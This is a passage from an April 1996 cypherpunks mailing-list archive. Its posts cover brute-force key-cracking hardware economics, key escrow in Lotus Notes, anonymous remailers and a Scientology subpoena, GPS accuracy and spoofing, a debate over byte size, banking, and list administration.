> situation would it take to get me (for instance), and one of
> cypherpunk's cryptography wizards, to take the time to collaborate on
> something like this.

	I completely agree.

	But I'd be surprised if it took much of a crypto wizard to do a
brute force cracker as a just a simple brute force cracker.  The task
would demand much  more of the skills of  a good  clever parallel logic
designer to figure out how to effectively pipeline the well known and
well defined crypto algorithms within the constraints of a still limited
FPGA. What a crypto wizard might add might lie more in the direction of
optimized strategies for key generation and scheduling to reduce the
number of clock ticks and or gates  devoted to this. The game of course
is how many keys per second per dollar... anyone can build something
that will eventually try a key, it is building something that will try
keys at a maximum rate on cheap hardware that is interesting.

	(Sorry to take so much list bandwidth on this)..

						Dave Emery
						die@die.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Sat, 13 Apr 1996 05:18:39 +0800
To: cypherpunks@toad.com
Subject: Entropy Estimator
Message-ID: <960412001922_511825948@mail02.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


I just added a feature to my entropy graphing program that estimates the
number of bits of entropy in the file, in addition to making the graph.  I
tested it on some ZIP files, comparing the sum of the results obtained from
each file individually to the results from the ZIP file containing all of
them.  So far, the results have been consistent within 20%.  EXE's show 3-4
entropy bits/byte, ZIP files show 6-7, and DLL's and text files show 1-2.
 Source code (Visual Basic) available to anyone who wants it, but I think I
will hold off on the EXE and VBX's until I find someone who will put it on
their FTP/WEB site.  Suggestions via email regarding this would be
appreciated.

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 12 Apr 1996 21:23:53 +0800
To: cypherpunks@toad.com
Subject: First Seven-Year-Old to Encrypt Solo!
Message-ID: <ad9349951602100496f2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I know Perry dislikes anything that smacks of mention of our personal lives
and that is not related to the IPv95 specs, but this is of interest, I
think. If not, ignore it and go back to reading the thread du jour.

On Saturday many of us--several dozen Cypherpunks, at least--had a beach
party/cookout on Tunitas beach, between Pescadero and Half Moon Bay,
roughly 30 miles south of San Francisco and 50 miles north of Santa Cruz.
Arranged by Doug Barnes, with help from Jim McCoy amongst others, it was a
blast. We looked at Comet Hyakutake, though no longer at peak brightness,
and even used the night vision scope provided by Jay Holovacs. Numerous CPs
in attendance, including Sandy Sandfort, Eric Hughes, Bill Stewart, Sameer
Perekh, Jude Milhon, Jay Campbell, Eric Hollander, Russell Whittaker,
Romana Machado, and on and on. (Sorry if I left anyone out...it got dark
and I didn't seen everyone, anyway.)

Ironically, the little girl who died today in a plane crash stunt was from
Pescadero, and took off yesterday from Half Moon Bay's airport. It has no
direct relevance to us, but is an interesting coincidence, given the small
sizes of these towns.

Synchronicity happens. If Sameer can paraphrase Freud, I can paraphrase Jung.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Sat, 13 Apr 1996 03:59:14 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Money supply is fake anyway
In-Reply-To: <199604111444.KAA20811@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.960412002240.2926C-100000@kolo.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 11 Apr 1996, Perry E. Metzger wrote:

> Thomas Grant Edwards writes:
> > Banks "invent" money on a daily basis.

> Really? Since when?

Since the invention of fractional reserve banking.  Banks loan out far
more than they have currency reserves.  This loaning out of non-existant
money inflates the money supply.  The trick of being a banker is loaning
out enough money to make a profit, while keeping enough currency on
reserve to pay people when they take money out of your bank. 

There is far more money in demand deposits (i.e. figures on a computer)
than there is currency (i.e. green stuff).  The ratio of demand deposits
to currency backing in banks is set by the government.  If everyone came
and took out all their currency for their demand deposits, banks would
fail right and left. 

The Federal Reserve also controls the expansion of the money supply by
buying and selling federal securities as well as setting interest rates on
its "loans of last resort" it makes to member banks. 

I don't consider the Fed a "conspiracy," as I believe that even in a
privatized money system, there would need to be flexible fractional
reserve banking to avoid damaging deflationary periods which come with
spurts of credit demand. 

Most of my free-market money buddies assure me that deflation in a
hard-money system is mainly a product of socialist spending policies
coming to an end, especially after a time of war.  I remain in belief that
even without massive government spending that hard currency would have
credit cycles that would lead to dangerous deflationary periods. 

As far as inflation, the Fed has managed to create the most massive 
inflationary period the U.S. has ever had.  

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Sat, 13 Apr 1996 01:36:02 +0800
To: cypherpunks@toad.com
Subject: Re: questions about bits and bytes [NOISE]
Message-ID: <960412012047_270015300@mail06>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-04-11 20:26:44 EDT, jeffb@sware.com writes:

>[I told myself I was going to stay out of this, but Jim Bell's dogmatic
>stance irks me... ]  Here's a citation from "Portability of C Programs
>and the Unix System" by S.C. Johnson and D.M. Ritchie (yes, that Richie)
>in the Bell System Technical Journal volume 57, Number 6, July-August 1978.

Citing sources from 1978 in the computing field is a little like using
dictionaries from the 1800's to dictate modern English usage.  My desktop
machine has as much computing power as some colleges had during that era.
 We've come a long way, baby!  Yes, in the past, the term "byte" applied to
entities other than 8 bits, but "8 bits" IS the commonly accepted, standard
meaning of "byte" now, in the present.  The fact that the meaning and usage
of words can change over time is not relevant to current meaning and usage.
 Anyone who wishes to dispute this should study the etymology of the word
"gay."

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 12 Apr 1996 21:26:32 +0800
To: cypherpunks@toad.com
Subject: Re: Message not deliverable
In-Reply-To: <Pine.BSF.3.91.960411123135.13200A-100000@kirk.edmweb.com>
Message-ID: <Pine.ULT.3.92.960412012248.26121B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 11 Apr 1996, Steve Reid continued to talk about...

> > >Subj:        Message not deliverable
> > >Date:        96-04-10 11:51:09 EDT
> > >From:        Administrator_at_DCACINTS@dca.com (Administrator)

Sheesh, are y'all really that shy, or did y'all (like me) assume that
someone else was going to take care of it?

I sent direct mail describing the problem to the two dca.com addresses on
cypherpunks. One of the two messages bounced, and I forged an unsubscribe
for that address. I guess we'll see if the problems stop. Since nobody at
dca.com has responded to this for a couple days, and since their
postmaster is asleep at the wheel, I don't see how anyone can complain.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Fri, 12 Apr 1996 23:30:39 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Know Your Net.Enemies Project
In-Reply-To: <ad9291d00f0210046a1c@[205.199.118.202]>
Message-ID: <Pine.BSF.3.91.960412014408.14210A-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> But this is quite a different thing from an "Enemies List," which I rather
> doubt would be useful per se to Barlow, Godwin, and other civil liberties
> activists.

I also think that an "Enemies List" would not be useful... It would only 
make people believe that the Cypherpunks are a bunch of anti-government 
terrorists.

A list would not be a problem in itself, after all the governments keep
their lists of "subversives". Maybe there should be a "Luddite List"...

  Ludd-ite n. (Eng. hist.) a member of those groups of workers who 
  deliberately smashed machinery in the industrial centers of the East 
  Midlands, Lancashire and Yorksire (1811-16), believing it to be a cause 
  of unemployment [after Ned Ludd, a late 18th-c. riot leader]

Of course, "Luddite" is usually used with a more general meaning, refering
to people who are ignorant of and/or resisting technology. I think it's a
very good word to use. It's apropriately demeaning, but not hateful. I
think it's a word that could be accepted and understood by the general
public. 

Just a thought.

=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| Alternate email: sreid@edmbbs.iceonline.com  sreid@sea-to-sky.net |
| PGP Fingerprint: 11 C8 9D 1C D6 72 87 E6  8C 09 EC 52 44 3F 88 30 | 
|             --- DISCLAIMER: JMHO, YMMV, IANAL. ---                |
=====================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.org (Ulf Moeller)
Date: Fri, 12 Apr 1996 19:51:35 +0800
To: cypherpunks@toad.com
Subject: Re: Scientologists may subpoena anonymous remailer records
In-Reply-To: <autopost.829264955.3442@ulf.mali.sub.org>
Message-ID: <m0u7Wp8-0000ABC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:

>some details. (To Jim Byrd, that "alumni account at Cal Tech" that you
>mentioned was one of the Cypherpunks remailers at Caltech that our own
>pioneering Hal Finney runs.)

From: noring@netcom.com (Jon Noring)
Subject: [X-Post, Caltech OFFICIALLY Speaks] -AB-,penet, and Caltech

*******************************************************
In article <3smmv3$ard@gap.cco.caltech.edu> rich@cco.caltech.edu (Richard E. Fagen) writes:

On Wednesday afternoon, February 8th, three private 
investigators  visited the Caltech Security Office and the Campus 
Computing Organization. The P.I.s wanted to know the identity of 
the holder of the account "tc" on the Caltech Alumni Association 
computer system (alumni.caltech.edu). They claimed to have 
gotten the account name from the anon.penet.fi server via the 
Helsinki police. Due to the unusual nature of this request, the 
P.I.s were told that Caltech would need more information before 
this type of information could be given out. Later that day, an 
attorney representing the Church of Scientology called the 
campus computing support office demanding the name of the 
account holder. The attorney claimed that a document had been 
stolen from a CoS computer system, and that the  document had 
been posted to the a.r.s newsgroup from alumni.caltech.edu via 
the anon remailer. (The claim was the document was created on 
Jan. 21 and appeared in a.r.s. on Jan. 24). The computing support 
staff did not divulge the name of the account holder, and the CoS 
attorney was referred to the Caltech General Counsel's office.

The Computer Crime Unit of the Bunco-Forgery Division of the 
LAPD subsequently contacted Caltech security and asked for 
more information on the case. The LAPD wanted to know if a 
breakin to the CoS computer had occurred from the alumni 
system. Caltech told the LAPD that no evidence of such a break 
in could be found. The LAPD requested and was given the name 
of the "tc" account holder with the understanding that this 
information would not be divulged. A couple days after that 
Caltech was informed that the LAPD could find no evidence that 
a crime had been committed.

In the ensuing several days, the attorney and P.I.s representing 
CoS made repeated attempts (both via phone and by physically 
appearing on the Caltech and JPL campuses) to obtain the 
contents of the tc account and also the tape backups (the account 
holder had admitted to deleting most of the contents of the 
account). The CoS attorney produced a letter allegedly signed by 
the tc account holder allowing CoS permission to get the data 
stored on that account and the backups. Due to irregularities 
with both the letter and a phone conversation with the account 
holder, permission for CoS to have access to the data in the 
account was denied by Caltech.

After the CoS attorney and P.I.s continued their attempts to get 
the data, Caltech retained the counsel of an independent law 
firm. Soon after that, all communication with the CoS ended. One 
phone call from the tc account holder requesting the backup data 
was received by the computing support staff. This request was 
also denied. That was the last communication with the account 
holder.

Our analysis is that Caltech was caught in the middle of what 
appears to be an internal matter between the Church of 
Scientology and one of its members, who also happened to be an 
account holder on the Caltech alumni computer. No evidence that 
a Caltech computer was used to break into another computer, or 
was used to store stolen documents could ever be found.

I hope this serves to shine a little light on this chain of events.

Rich Fagen
Director, Campus Computing Organization
Caltech


****************** end of cross-post ********************

-- 
OmniMedia              | The Electronic Bookstore.  Come in and browse!  Two
9671 S. 1600 West St.  | locations:  ftp.netcom.com  /pub/Om/OmniMedia/books
South Jordan, UT 84095 | and  ftp.awa.com  /pub/softlock/pc/products/OmniMedia
801-253-4037           | E-book publishing service follows NWU recommendations.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Sat, 13 Apr 1996 04:01:37 +0800
To: cypherpunks@toad.com
Subject: Private Idaho 2.6b3 release
Message-ID: <199604121358.GAA19551@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Private Idaho 2.6b3 (a freeware Windows front-end to PGP, anonymous
remailers, and nym servers) is now available at:

http://www.eskimo.com/~joelm

New features include:

licensed IPPort - no more "nag" screen on start-up
support for multiple nym servers and nyms
support for multiple PGP keys for signing
support for printing messages
support for transfer to multiple applications

Questions, comments to joelm@eskimo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 13 Apr 1996 06:23:02 +0800
To: Sten Drescher <cypherpunks@toad.com
Subject: Re: questions about bits and bytes
Message-ID: <m0u7lBY-0008yHC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:17 PM 4/11/96 -0500, Sten Drescher wrote:
>>>>>> jim bell writes:
>
>jb> At 06:29 PM 4/10/96 -0700, Simon Spero wrote:
>>> No, bytes are no always 8 bits - some machines use(d) 9-bit bytes.
>
>jb> I notice you gave no examples.  Why is that?
>
>	As I recall, the Honeywell H6000 used 6-bit bytes and 36-bit
>(6 byte) words.

Here's the problem with this kind of counter-example:  You do not explain 
whether or not these data structures were actually called "bytes" by the 
manufacturer, or whether the term "byte" was inflicted later on by people 
who didn't know better.  Remember, in the absence of any name for a "6-bit 
data object" I'm sure the temptation was probably very strong to misuse a 
term, especially in hindsight.

See, I do not challenge the fact that there were plenty of data objects of 
length other than 8-bits.  The issue is whether or not the people back then 
actually believed that a correct, official usage of the term "byte" included 
lengths other than 8.

Dmitri Vulis at least acknowledged that when he looked back into the 
documentation, he discovered that the term used for his counter-example was 
"character", not byte.  How many other of these counter-examples would show 
this kind of thing?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 13 Apr 1996 01:56:55 +0800
To: Thomas Grant Edwards <tedwards@glue.umd.edu>
Subject: Re: Money supply is fake anyway
In-Reply-To: <Pine.SUN.3.91.960412002240.2926C-100000@kolo.isr.umd.edu>
Message-ID: <199604121257.IAA24747@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Thomas Grant Edwards writes:
> On Thu, 11 Apr 1996, Perry E. Metzger wrote:
> 
> > Thomas Grant Edwards writes:
> > > Banks "invent" money on a daily basis.
> 
> > Really? Since when?
> 
> Since the invention of fractional reserve banking.  Banks loan out far
> more than they have currency reserves. 

Thats true. However, that isn't the same as "inventing" money. They
never give out money they don't have -- they can't.

> This loaning out of non-existant money inflates the money supply.

You made two magical jumps here. The first was the notion that they
are loaning out non-existant money. That is false. They only loan out
money that they have on hand, and the value of their assets in the
form of loans + reserves is always higher than the value of their
debts to depositors. It is true that they don't have the value of all
their assets on hand to give to creditors if they demand it, but then
again you probably don't have all your assets in a liquid form either.
The second magical leap you make here is that this is somehow
inflationary, which of course it isn't.

> There is far more money in demand deposits (i.e. figures on a computer)
> than there is currency (i.e. green stuff).

It is true enough that the total sum of demand deposits exceeds the
total value of outstanding currency. So what?

> The Federal Reserve also controls the expansion of the money supply by
> buying and selling federal securities as well as setting interest rates on
> its "loans of last resort" it makes to member banks. 

You are correct that the fed creates and destroys money. You are not
correct that ordinary banks do, or in your assertion that the fed
substantially controls the expansion of the money supply through the
discount rate.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Loysen <dwl@hnc.com>
Date: Sat, 13 Apr 1996 05:58:41 +0800
To: cypherpunks@toad.com
Subject: Re: No matter where you go, there they are.
Message-ID: <199604121604.JAA02423@spike.hnc.com>
MIME-Version: 1.0
Content-Type: text/plain


[CHOMPED]

>    Close, but not quite:
>S/A is an ADJUSTABLE variable, not on/off. it can reduce accuracy to 
>10 meters or 100 meters or whatever. It's a DoD term, not NWO term.
>    The "this is where you really are" percision location (forgot 
>the designation off hand) is ENCRYPTED (yes, there is crypto 
>revelance here...) in the data stream from the satellites. The 
>difference S/A makes is on the order of magnitude, therefore not 
>"useless." It should be pointed out that different regions of the 
>earth can have different degrees of accuracy based on the S/A system.
>    I doubt S/A will ever be turned off, but this is my opinion. I 
>know Jim's opinion. Discussion of this point is pointless.
>    DGPS transmission are made from a multiple single points, which 
>(to the best of my knowledge) are not networked.
>    glenn

Does anyone else get a little upset at the thought of one Government agency
(DoD) spending money to install the GPS system, then making it less accurate
than it should be, and then a second Government agency (US Coast Guard)
spending money to improve the system by installing DGPS stations. Plus, in
order to get the real accuracy of GPS right now I have to spend more money
on a much more expensive DGPS unit.

Pisses me right the F### off.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerry Whiting <jwhiting@igc.apc.org>
Date: Sat, 13 Apr 1996 14:54:19 +0800
To: cypherpunks@toad.com
Subject: Lotus Notes 24-bit sellout
Message-ID: <199604121621.JAA01379@igc2.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain



When Ray Ozzie announced the work reduction sellout at the RSA conference, 
both he and Ms Denning (whom I spoke with about it later) mentioned that 
there was something else in Lotus Notes 4 besides the 40+24 bit compromise.

My thought is that the NSA gave them something else in exchange for the 
mandatory escrow scheme they're all talking about publicly.  Perhaps some 
other crypto code the NSA had lying around unused.

So looking for a common 24-bit subkey may reduce Notes' key to a 40-bit 
brute force exercise but the 40+24 is probably not ALL that's in Notes 4.

Definitely a deal with the Devil.  Given that we're talking about IBM, not 
Lotus none of this surprises me given IBM's Lucifer/DES history with spook 
input years ago.  Then again to be fair, I don't know if the 40+24 deal 
was cooked up before or after the IBM/Lotus merger.


Jerry Whiting
Azalea Software, Inc.

P.S.  Yes, I'm the one doing carrick "Encryption software so good, the Feds 
won't let us export it."  In fact, we schedule for a visit from the NSA 
next month regarding our desire to export carrick to Australia.  The mere 
mention of a Blowfish-based crypto product left my assigned spook momentarly 
speechless.  Something tells me they ain't gonna let carrick out of the 
country with a key length worth using.  AND I DEFINITELY AIN'T INTERSTED 
IN MAKING A DEAL WITH THE DEVIL.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark J. Reed" <mark_reed@sware.com>
Date: Sat, 13 Apr 1996 03:49:16 +0800
To: cypherpunks@toad.com
Subject: Re: questions about bits and bytes [NOISE]
Message-ID: <9604121405.AA21928@shlep.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


JonWienke@aol.com writes:
\ In a message dated 96-04-11 20:26:44 EDT, jeffb@sware.com writes:
\ Citing sources from 1978 in the computing field is a little like using
\ dictionaries from the 1800's to dictate modern English usage.  My desktop
\ machine has as much computing power as some colleges had during that era.
\  We've come a long way, baby!  Yes, in the past, the term "byte" applied to
\ entities other than 8 bits, but "8 bits" IS the commonly accepted, standard
\ meaning of "byte" now, in the present.  The fact that the meaning and usage
\ of words can change over time is not relevant to current meaning and usage.
\  Anyone who wishes to dispute this should study the etymology of the word
\ "gay."
\ 
\ Jonathan Wienke
\ 

No, no.  What started this whole discussion was someone claiming that
bytes have ALWAYS been 8 bits.  That was the argument.  NO-ONE is
claiming that byte doesn't mean 8 bits NOW.  I think we have now
established that, yes, 'byte' is synonymous with 'octet' in the modern
computer era, and no, this was not always the case.  Now can we move on
to other matters?

--
Mark J. Reed
Email: mark_reed@sware.com - Voice: +1 404 315 6296 x158 - Fax: +1 404 315 6407
Hewlett-Packard Co. / 2957 Clairmont Rd Suite 220 / Atlanta GA 30329-1647
E-Mail Privacy by SecureMail.  Visit URL:http://www.secureware.com/ for details.

--
Mark J. Reed
Email: mark_reed@sware.com - Voice: +1 404 315 6296 x158 - Fax: +1 404 315 6407
Hewlett-Packard Co. / 2957 Clairmont Rd Suite 220 / Atlanta GA 30329-1647
E-Mail Privacy by SecureMail.  Visit URL:http://www.secureware.com/ for details.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Sat, 13 Apr 1996 23:22:12 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: Protocols at the Point of a Gun
In-Reply-To: <v02120d2bad91ecd377cc@[192.0.2.1]>
Message-ID: <v03005b03ad944efa70c3@[206.126.100.99]>
MIME-Version: 1.0
Content-Type: text/plain


>Lucky Green writes:
>>At 9:48 4/10/96, Duncan Frissell wrote:
>>[...]
>>>We know that governments would like to impose things like the Simple
>>>Tax Transfer Protocol on the Net as well as Is A Person (and Is A Minor)
>>>Protocols.
>>
>>There is one thing about the proposed minor flag addition to IP that I
>>don't understand. [No, I am not surprised by this. Mandatory authorization
>>to establish a connection and an "Internet Driver License", probably in the
>>form or a smart card are coming].
>>
>>If my computer creates the IP packet, what is there to prevent me from
>>modifying the value of the "Minor/Adult" flag at my leisure?
>
>Yikes!  Don't lend it the credibility of calling it "proposed".
>Someone might think you're serious.  "Suggested" is as far as I'd go.
>
>Anyway, you computer creates the IP packet, but then sends it to your
>ISP's router.  That router *always* makes changes to the packet header
>because it must decrement the time-to-live field and recompute the
>header checksum.  The ISP's router software would (in the scenario I
>suggested, but deplore), based on to whom it's connected, set the
>drivers licence flag as it sees fit.  When a PPP account of a "minor"
>sends a packet, the router always inserts "minor".  When the account of
>an adult sends it, it inserts "adult".  When the account of a partner
>who has contractually accepted liability for the flag's setting sends a
>packet, it leaves it alone.
>
How would this work in my case?
I have a Pipeline 25 ISDN router in my house.
I have several computers, used by myself, my wife, and my kids, connected
via Ethernet to the p25. The router talks to my provider. I have _one_
account at my provider.

Multiple IP #s, multiple machines, multiple users, ONE account.
Which router will insert the "suggested" flag, and how will it decide which
packets to tag?

I suspect the people who thought this up haven't thought it through. :-)
They are confusing "ISP accounts" with "e-mail" addresses, maybe?

My setup may be unusual, but it's certainly not unique.

-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"Eternal vigilance is the price of PostScript"
-- MacUser Jan 96 DTP and Graphics column






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 13 Apr 1996 13:39:07 +0800
To: Batman <cypherpunks@toad.com>
Subject: "Batman" Read!--How to Unsubscribe
Message-ID: <ad93d76119021004e784@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:11 PM 4/11/96, Batman wrote:
>Please PUT me OUT of YOUR cypherpunks AND other MAIL-LISTS
>
>Thankx

I sent you instructions by private e-mail, and in a separate posting on the
list. If you had read either of these messages and followed the
"unsubscribe" instructions, you could remove yourself from the list.

If, however, you are not reading messages that arrive in your mailbox,
including messages on this list and personal mail, then you are likely not
reading _this_ message either, and it is hopeless for you. You will be
condemned to getting list traffic until you get a clue.

On the off chance you read this message by either of the routes,
instructions are included _again_ at the end of this message.

(And I have retitled your thread name...the message name "Re:" is not
terribly helpful, and indicates you took no time to compose a meaningful
title.)


How to subscribe to the Cypherpunks mailing list: send a message to
"majordomo@toad.com" with the body message "subscribe cypherpunks". To
unsubscribe, send the message "unsubscribe cypherpunks" to the same
address. For help, send "help cypherpunks".  Don't send these requests to
the Cypherpunks list itself. And be aware that the list generates between
40 and 100 messages a day.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 13 Apr 1996 19:12:13 +0800
To: cypherpunks@toad.com
Subject: Calvin and Hobbes
Message-ID: <ad93d9911a0210046aff@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:14 AM 4/12/96, Adam Shostack wrote:

>        Snow Crash is a book about a future in which governments are
>ineffective.  Companies run things, and have complete local control.
>The world has gone to hell, and as a result, life is nasty, poor,
>brutish and short.  Many people do not look forward to this world.


Reminds me of a good joke I heard about the comic strip "Calvin and Hobbes"
(Calvin is a little boy, Hobbes is his stuffed toy tiger, who only Calvin
can see is alive).

Why is Calvin so much like Hobbes? He's nasty, brutish, and short.



(I heard this from Chip Morningstar...I don't know where he heard it, or if
perchance he invented it.)

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sat, 13 Apr 1996 06:31:28 +0800
To: <cypherpunks@toad.com
Subject: Re: No matter where you go, there they are.
Message-ID: <199604121441.HAA08990@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> From: Roger Williams <roger@coelacanth.com>
> >>>>> Hal  <hfinney@shell.portal.com> writes:
> 
>   > Note however that Denning did not mention the Internet in her
>   > spiel.
> 
> Well, assuming that she wrote *any* of the spiel, she does:
> 
>  "Where it works
> 
>   ... Location-based
>   authentication could facilitate telecommuting by countering the
>   vulnerabilities associated with remote access over dial-in lines and
>   Internet connections..."


She wrote it. The original of the paper may be found at 

http://all.net/journal/csi/csi-96-01.html

Peter Trei
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 13 Apr 1996 19:58:11 +0800
To: cypherpunks@toad.com
Subject: Re: Protocols at the Point of a Gun
Message-ID: <v02120d38ad9441032fa6@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:48 4/11/96, Timothy C. May wrote:
>As required by the CDA (Competency Disclosure Act) my Ignorance bit is set
>to "1" for this speculation.
>
>At 11:03 PM 4/10/96, Lucky Green wrote:
>
>>If my computer creates the IP packet, what is there to prevent me from
>>modifying the value of the "Minor/Adult" flag at my leisure?
>
>Are the "minor/adult" settings (and Christian/Atheist, Southern
>Baptist/Reformed Baptist, Creationist/Evolutionist, etc. bits) even be
>proposed to be set at the IP packet level?

Yup. Sen. Exon and this staff demand that IP be redesigned to include such
a flag. No doubt, we'll soon hear about demands to include a male/female
flag, a cast flag (there go another two bits), a flag for meat
eater/vegetarian, a flag indicating your HIV status, one they get going,
the sky is the limit.

>I'd've thought it would be at the message level, such as this message or a
>posting to Usenet. (Granted, many messages are presumably the same as IP
>messages. But I'd assume that the setting would be within the message, so
>that any forwarder of the packet would not be likely to tamper with
>internal message settings....)

Sure. Access control belongs into the application layer, or somewhere
nearby. The problem is that those in power wouldn't know a modem if it bit
them in the ass. Expect legislation that mandates routers to support the
various flags in the near future.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 13 Apr 1996 08:06:17 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Why there are so many cluless people
Message-ID: <v02120d39ad9446cc8b78@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


Today, I heard a commercial on the radio. Some company wants to help you
make $1k+ per day as an Internet expert. Simply listen to their one week
audio tape course and you know everything you need to work as an Internet
consultant.

Sigh,

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Sat, 13 Apr 1996 08:21:17 +0800
To: cypherpunks@toad.com
Subject: Re: questions about bits and bytes
In-Reply-To: <m0u7Ov4-000903C@pacifier.com>
Message-ID: <doug-9603121634.AA0247400@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Apr 12 at 8:07
jim bell wrote:
>
>Are you sure they're not referring to 8 bits of data and a parity bit?  In 
>any case, please give the address to the list so that it can be checked out.
>
>
>

Come on, give it up already and admit you were wrong. At least 8 different
people have cited examples of machines that supported non 8bit bytes. Your
pride is getting the best of you.

If you mean 8 bits, you should really say Octets as has always been the
form of Internet RFC's where the distinction is important.

It may be standard today, but it was not always so..

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		Pro is to Con as progress is to congress




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 13 Apr 1996 06:18:53 +0800
To: cypherpunks@toad.com
Subject: Mardi Gra Cash Card
Message-ID: <199604121538.LAA29724@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   WSJ 4-12-06 reports that England's "Mardi Gra" bomber is
   demanding of Barclays "access to the bank's cash reserves
   through the use of a special cash card, although details
   could not be confirmed."

   Police are communicating with the bomber through cryptic
   notices in personal columns of newspapers, the latest
   stating: "MARDI GRA We are ready to help and give value.
   Contact us on the verification number."

   Barclays says 25 bombs have been sent to its branches. The
   bomber -- who has been compared to America's Unabomber --
   may be a former employee among those 18,500 laid off during
   the past 5 years, or a small businessman with a grudge. [Or 
...]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 13 Apr 1996 08:22:35 +0800
To: cypherpunks@toad.com
Subject: Re: No matter where you go, there they are.
Message-ID: <199604121849.LAA12509@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


[ Dorothy - there's been substantial discussion on cypherpunks
about your position escrow proposal; the paper that's on your web page
was posted here.]

At 03:01 PM 4/11/96 -0400, perry@piermont.com wrote:
>Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com writes:
>> Suppose I want to pretend that I am 1000 feet closer to satellite 4 than 
>> I really am.  Simple, I take the signals from all the other satellites
>> and delay them by 1 microsecond.  That looks like a 1 microsecond
>> local timebase error together with a 1 microsecond delay reduction
